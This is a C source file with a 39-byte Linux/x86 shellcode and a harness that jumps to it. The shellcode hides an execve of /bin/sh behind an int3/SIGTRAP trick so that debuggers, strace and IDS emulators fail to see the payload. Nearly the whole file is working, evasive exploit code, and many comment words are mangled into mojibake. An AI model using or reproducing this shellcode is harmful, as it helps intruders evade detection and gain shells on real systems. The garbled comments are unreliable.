/*
 * (linux/x86) anti-debug trick (INT 3h 櫡ʤˤ«¤±¤ë¡Ë) + execve("/Ãù¢½ê/sh", ["/Ãù¢½ê/sh", NULL], NULL) - 39 bytes 
 * 
 * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any ¿äÏÀ¤¹¤ë¡¿Íýͳ the IDS 
 * would try to x86-emulate the shellcode it would *glitch* and fail. This also Êݸ¤ës the shellcode 
 * from running within a debugger ´Ä¶­ such as gdb and strace. 
 *
 * How this ºîÉÊ? the shellcode ÅÐÏ¿¡Ê¤¹¤ë¡Ës for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it 
 * to call the acutal payload (e.g. _evil_code) while a greedy debugger or a º®Í𤵤»¤ëd x86-emu won't pass 
 * the signal handler to the shellcode, it would ·ë¶ÉºÇ¸å¤Ë¤Ï¡¼¤Ê¤ë doing _exit() instead execuve() 
 *
 * - izik <izik@tty64.org>
 */

char shellcode[] = 

	"\x6a\x30"              // ²¡¤·¿Ê¤á¤ë $0x30 
	"\x58"                  // pop %eax 
	"\x6a\x05"              // ²¡¤·¿Ê¤á¤ë $0x5 
	"\x5b"                  // pop %ebx 
	"\xeb\x05"              // jmp <_evil_code> 

	//
 	// <_evilcode_loc>:
	//

	"\x59"                  // pop %ecx 
	"\xcd\x80"              // int $0x80 
	"\xcc"                  // int3 
	"\x40"                  // inc %eax 
	"\xe8\xf6\xff\xff\xff"  // call <_evilcode_loc> 
	"\x99"                  // cltd 

	// 
        // <_evil_code>: 
        //

	"\xb0\x0b"              // mov $0xb,%al 
	"\x52"                  // ²¡¤·¿Ê¤á¤ë %edx 
	"\x68\x2f\x2f\x73\x68"  // ²¡¤·¿Ê¤á¤ë $0x68732f2f 
	"\x68\x2f\x62\x69\x6e"  // ²¡¤·¿Ê¤á¤ë $0x6e69622f 
	"\x89\xe3"              // mov %esp,%ebx 
	"\x52"                  // ²¡¤·¿Ê¤á¤ë %edx 
	"\x53"                  // ²¡¤·¿Ê¤á¤ë %ebx 
	"\x54"                  // ²¡¤·¿Ê¤á¤ë %esp 
	"\xeb\xe1";             // jmp <_evilcode_loc> 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}